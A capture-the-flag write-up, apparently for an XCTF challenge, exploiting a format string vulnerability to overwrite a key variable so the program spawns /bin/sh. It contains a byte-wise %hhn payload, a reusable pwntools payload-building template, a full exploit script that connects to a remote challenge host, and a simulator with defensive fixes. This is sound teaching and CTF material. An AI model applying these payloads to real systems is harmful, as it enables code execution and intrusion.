Protections:
Flow: main()
When key = 35795746 = 0x2223322, the program calls system("/bin/sh"), and imagemagic() contains a format string vulnerability. So all we need to do is change the value of key.
First determine the offset.
The offset is 12. But we need to write 35795746 = 0x2223322 to the address of key, and printing 35795746 characters in one go may overflow the input buffer and stop the program from running. So we write a single byte at a time, giving payload=p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+"%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn" (data is stored little-endian in memory, and %hhn writes a single byte).
\x22=34 \x33=51 \x22=34 \x02=2
18+16=34=0x22 34+17=51=0x33 51+239=290=0x122 290+224=514=0x202
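To check the padding arithmetic above without running anything against a target, here is an added example (not code from the writeup) that rebuilds the same byte-wise %hhn format string from the key address, the stack offset and the target value, and then models what a vulnerable printf(buf) would store: a running character counter whose low byte lands at each address. The constants KEY_ADDR, TARGET and OFFSET are taken from the writeup; the function names and the simulator are mine and use only the Python standard library.

```python
import re

# Values from the writeup (the key variable's address, the wanted value, the
# positional index at which the payload's first dword sits on the stack).
KEY_ADDR = 0x0804a048
TARGET = 0x2223322
OFFSET = 12
WIDTH = 4  # 32-bit binary, addresses emitted as 4-byte dwords


def build_hhn_payload(offset, addr, target, width=WIDTH):
    """Return (addresses, fmt) for a byte-wise %hhn overwrite of target at addr.

    Same arithmetic as the writeup's fmt_str(): the four addresses are printed
    first (4*width characters), then each byte is reached with %Nc padding and
    stored with %<idx>$hhn. The count is tracked modulo 256 because %hhn keeps
    only the low byte of the running character count."""
    addrs = [addr + i for i in range(4)]
    fmt = ""
    printed = len(addrs) * width          # characters used up by the raw addresses
    for i in range(4):
        want = (target >> (8 * i)) & 0xff  # little-endian: low byte first
        pad = (want - printed) % 256       # 0 means the counter already matches
        if pad:
            fmt += "%%%dc" % pad
        fmt += "%%%d$hhn" % (offset + i)
        printed = want
    return addrs, fmt


def simulate_printf(addrs, fmt, offset, width=WIDTH):
    """Model the effect of printf(buf) on the bytes this payload targets.

    Only the two directives the payload uses (%Nc and %N$hhn) are modelled.
    Returns (memory, count): memory maps address -> byte written, count is the
    total number of characters printf would have emitted."""
    count = len(addrs) * width  # the raw address bytes are printed as characters
    mem = {}
    for m in re.finditer(r"%(\d+)(c|\$hhn)", fmt):
        n, kind = int(m.group(1)), m.group(2)
        if kind == "c":
            count += n                     # %Nc pads to a width of N characters
        else:
            # positional argument offset+k is the k-th address we placed
            mem[addrs[n - offset]] = count & 0xff
    return mem, count


def read_dword(mem, addr):
    """Reassemble the four bytes at addr as a little-endian 32-bit value."""
    return sum(mem[addr + i] << (8 * i) for i in range(4))


if __name__ == "__main__":
    addrs, fmt = build_hhn_payload(OFFSET, KEY_ADDR, TARGET)
    mem, count = simulate_printf(addrs, fmt, OFFSET)
    print(fmt)                                   # the format part of the payload
    print(hex(read_dword(mem, KEY_ADDR)), count) # value stored, characters printed
```

The simulation shows why the byte-wise approach is used: the whole write costs 514 printed characters instead of 35795746. From the defender's side, the root cause is the same in every such program: user input is passed to printf() as the format argument. Calling printf("%s", buf) instead, and building with -Wformat -Wformat-security so that a non-literal format is flagged, removes the primitive entirely.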
A template can also be used:
from pwn import *


def fmt(prev, word, index):
    # prev: low byte of the characters printed so far; word: byte to write;
    # index: positional argument index of the address that receives it
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        fmtstr = ""  # counter already matches, no padding needed
    else:
        result = 256 + word - prev  # wrap around, %hhn only keeps the low byte
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


# offset: stack offset of the first address to overwrite; size: machine word length;
# addr: address to overwrite; target: value to write there
def fmt_str(offset, size, addr, target):
    payload = b""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)  # the raw addresses are printed first
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i).encode()
        prev = (target >> i * 8) & 0xff
    return payload
from pwn import *

# sh = process('./a')
sh = remote('124.126.19.106', '37070')


def fmt(prev, word, index):
    # prev: low byte of the characters printed so far; word: byte to write;
    # index: positional argument index of the address that receives it
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        fmtstr = ""  # counter already matches, no padding needed
    else:
        result = 256 + word - prev  # wrap around, %hhn only keeps the low byte
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


# offset: stack offset of the first address to overwrite; size: machine word length;
# addr: address to overwrite; target: value to write there
def fmt_str(offset, size, addr, target):
    payload = b""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)  # the raw addresses are printed first
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i).encode()
        prev = (target >> i * 8) & 0xff
    return payload


# payload=p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+"%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn"
payload = fmt_str(12, 4, 0x0804a048, 0x2223322)
sh.sendline(payload)
sh.interactive()
xctf 實時資料監測